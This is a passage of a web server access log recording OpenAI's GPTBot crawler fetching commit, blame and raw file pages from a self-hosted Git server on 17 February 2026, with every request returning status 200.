192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/Project%20Planning-1.md" +[17/Feb/2026:15:23:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/Project%20Planning-1.md" [Client 74.7.227.38] [Length 19269] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/Project%20Planning-1.md" +[17/Feb/2026:15:23:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=.Backup%2fhtml%2fREADME.md" [Client 74.7.227.38] [Length 23587] [Gzip 3.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/README.md" +[17/Feb/2026:15:23:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=.Backup%2fhtml%2ftypes.ts" [Client 74.7.227.38] [Length 23302] [Gzip 3.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/types.ts" +[17/Feb/2026:15:23:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 11603] [Gzip 3.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:15:23:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 11602] [Gzip 3.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:15:23:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 11573] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:15:23:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 11604] [Gzip 3.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:15:23:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 11602] [Gzip 3.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:15:23:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=PostgresWatchdog%2flibiconv-2.dll" [Client 74.7.227.38] [Length 23756] [Gzip 4.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libiconv-2.dll" +[17/Feb/2026:15:23:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d?files=GoldPilot%2fuser_assets.csv" [Client 74.7.227.38] [Length 22675] [Gzip 4.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/user_assets.csv" +[17/Feb/2026:15:23:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d?files=GoldPilot%2fassets_data.csv" [Client 74.7.227.38] [Length 22703] [Gzip 4.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/assets_data.csv" +[17/Feb/2026:15:23:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=PostgresWatchdog%2flibintl-8.dll" [Client 74.7.227.38] [Length 23755] [Gzip 4.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libintl-8.dll" +[17/Feb/2026:15:23:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c?files=PostgresPatrol%2f.python-version" [Client 74.7.227.38] [Length 20246] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/.python-version" +[17/Feb/2026:15:23:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c?files=PostgresPatrol%2fbuild_exe.bat" [Client 74.7.227.38] [Length 23050] [Gzip 4.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build_exe.bat" +[17/Feb/2026:15:23:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 9962] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" +[17/Feb/2026:15:23:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 10940] [Gzip 3.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" +[17/Feb/2026:15:23:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 10917] [Gzip 3.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" +[17/Feb/2026:15:23:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 10941] [Gzip 3.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" +[17/Feb/2026:15:23:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 10939] [Gzip 3.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" +[17/Feb/2026:15:23:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 10940] [Gzip 3.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" +[17/Feb/2026:15:23:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 316] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" +[17/Feb/2026:15:23:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 316] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" +[17/Feb/2026:15:23:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 316] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" +[17/Feb/2026:15:23:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 316] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" +[17/Feb/2026:15:23:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 316] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" +[17/Feb/2026:15:23:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/fd51c36120e0bc559f08a35a65c69351c564222a?files=.Backup%2fhtml%2fassets%2fimages%2finstrument.png" [Client 74.7.227.38] [Length 19810] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/instrument.png" +[17/Feb/2026:15:23:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/package.json?display=source" [Client 74.7.227.38] [Length 11685] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/package.json" +[17/Feb/2026:15:23:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/package.json?display=rendered" [Client 74.7.227.38] [Length 10879] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/package.json" +[17/Feb/2026:15:23:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/package.json?display=source" [Client 74.7.227.38] [Length 11685] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/package.json" +[17/Feb/2026:15:23:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/package.json?display=rendered" [Client 74.7.227.38] [Length 10878] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/package.json" +[17/Feb/2026:15:23:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/xref-PostgresPatrol.html" [Client 74.7.227.38] [Length 227361] [Gzip 18.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol" +[17/Feb/2026:15:23:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/998d733eb52423ffff2f8602efdfb1282198a61f?files=Dockerfile" [Client 74.7.227.38] [Length 18878] [Gzip 3.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/Dockerfile" +[17/Feb/2026:15:23:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/.Notebook/OpcTest%20program%20by%20claude.md" [Client 74.7.227.38] [Length 9923] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/.Notebook/OpcTest%20program%20by%20claude.md" +[17/Feb/2026:15:23:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/index.tsx?display=source" [Client 74.7.227.38] [Length 11632] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/index.tsx" +[17/Feb/2026:15:23:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/README.md?display=source" [Client 74.7.227.38] [Length 15804] [Gzip 4.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/README.md" +[17/Feb/2026:15:23:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/Project%20Planning-1.md" [Client 74.7.227.38] [Length 20373] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project" +[17/Feb/2026:15:23:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/tsconfig.json?display=source" [Client 74.7.227.38] [Length 11873] [Gzip 3.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/tsconfig.json" +[17/Feb/2026:15:23:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/status.json?display=source" [Client 74.7.227.38] [Length 11065] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/status.json" +[17/Feb/2026:15:23:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/services/geminiService.ts?display=rendered" [Client 74.7.227.38] [Length 10911] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/services/geminiService.ts" +[17/Feb/2026:15:23:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/metadata.json?display=source" [Client 74.7.227.38] [Length 11278] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/metadata.json" +[17/Feb/2026:15:23:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/status.json?display=rendered" [Client 74.7.227.38] [Length 10896] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/status.json" +[17/Feb/2026:15:23:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/xref-PostgresPatrol.html" [Client 74.7.227.38] [Length 9923] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/xref-PostgresPatrol.html" +[17/Feb/2026:15:23:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/xref-PostgresPatrol.html" [Client 74.7.227.38] [Length 347418] [Gzip 27.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/xref-PostgresPatrol.html" +[17/Feb/2026:15:23:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?files=.Notebook%2fOpcTest%20program%20by%20claude.md" [Client 74.7.227.38] [Length 34366] [Gzip 8.65] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/.Notebook/OpcTest%20program%20by%20claude.md" +[17/Feb/2026:15:23:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/xref-PostgresPatrol.html" [Client 74.7.227.38] [Length 323599] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/xref-PostgresPatrol.html" +[17/Feb/2026:15:23:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/package.json?display=rendered" [Client 74.7.227.38] [Length 10874] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/package.json" +[17/Feb/2026:15:23:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/Project%20Planning-1.md" [Client 74.7.227.38] [Length 9943] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/Project%20Planning-1.md" +[17/Feb/2026:15:23:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/Project%20Planning-1.md" [Client 74.7.227.38] [Length 43156] [Gzip 20.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/Project%20Planning-1.md" +[17/Feb/2026:15:23:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/Project%20Planning-1.md" [Client 74.7.227.38] [Length 19269] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/Project%20Planning-1.md" +[17/Feb/2026:15:23:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/tsconfig.json?display=rendered" 